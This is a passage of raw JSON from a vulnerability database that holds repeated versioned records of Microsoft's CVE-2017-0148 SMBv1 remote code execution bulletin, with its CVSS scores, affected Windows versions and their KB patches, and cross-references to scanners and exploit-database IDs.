systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-04T16:51:19", "differentElements": ["msAffectedSoftware"], "edition": 10}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-05T06:46:35", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T06:46:35", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-05T06:46:35", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3210721", "KB4012215", "KB3210720", "KB3213986", "KB3205409", "KB3205401", "KB4012214", "KB3212646", "KBMS16-110, 3187754", "KB4013429", "KB4013198", "KB4012216", "KB4012213", "KB4012598", "KB4012212", "KB4012606", "KB4012217", "KB3177186"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T06:46:35", "differentElements": ["msAffectedSoftware"], "edition": 11}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-05T08:49:10", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-05T08:49:10", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-05T08:49:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB4012212", "KB3213986", "KB3210720", "KB4012606", "KBMS16-110, 3187754", "KB3205401", "KB3205409", "KB3212646", "KB3210721", "KB4012214", "KB3177186", "KB4012215", "KB4012213", "KB4012216", "KB4013198", "KB4013429", "KB4012598"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T08:49:10", "differentElements": ["msAffectedSoftware"], "edition": 12}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-05T18:46:16", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": 